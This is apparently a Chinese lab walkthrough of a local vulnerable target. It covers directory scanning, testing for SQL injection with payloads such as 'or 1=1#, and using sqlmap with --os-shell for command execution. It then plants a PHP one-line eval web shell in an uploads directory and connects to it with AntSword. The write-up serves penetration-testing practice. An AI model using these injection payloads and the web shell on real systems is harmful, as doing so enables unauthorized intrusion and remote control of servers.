目录
一、主机发现
启动靶机
虚拟机为NAT模式,我们根据真实机VMnet8的IP将虚拟机的IP扫描出来。
可以看到页面什么都没有。所以我们需要进一步扫描。
扫描目录,index是我们刚刚访问的界面。双击打开robots.txt。
有新发现的目录,我们挨个访问一下看看。
发现只有se3reTdir777能够访问。
二、漏洞发现
看到是查询页面,考虑sql注入。先输入一下 ' 发现报错。
再输入
'or 1=1#
初步判断有SQL注入漏洞,我们用bp抓下包,然后用sqlmap跑一下。
全选复制抓包内容到文本,使用如下命令跑一下:
python sqlmap.py -r C:\Users\sya\Desktop\6.txt –batch
出现此页面,确实存在sql注入
我们接下来的思路是写入木马,但是需要一个可写入路径需要我们找一下。
上面我们扫到的目录有好几个不能访问,我们需要深入对他们扫描一下。
发现了新大陆,我们双击打开看一下是phpinfo。
三、漏洞利用
Ctrl+f 搜索一下/m3diNf0/,发现了路径:/home/www/html/web1x443290o2sdf92213/
我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
先用如下命令获取交互式的系统命令执行环境。
python sqlmap.py -r C:\Users\sya\Desktop\6.txt --os-shell
现在我们就可以通过上传一句话木马了。
echo '<?php @eval($_POST['cmd']);?>' > 2.php
蚁剑连接
注:蚁剑连接为连接php可显示页面
这里2.php存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下
但是不能网页直接访问
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
这里很多人被误导导致无法连接
正常路径在
http://192.168.222.132/se3reTdir777/uploads/2.php
连接成功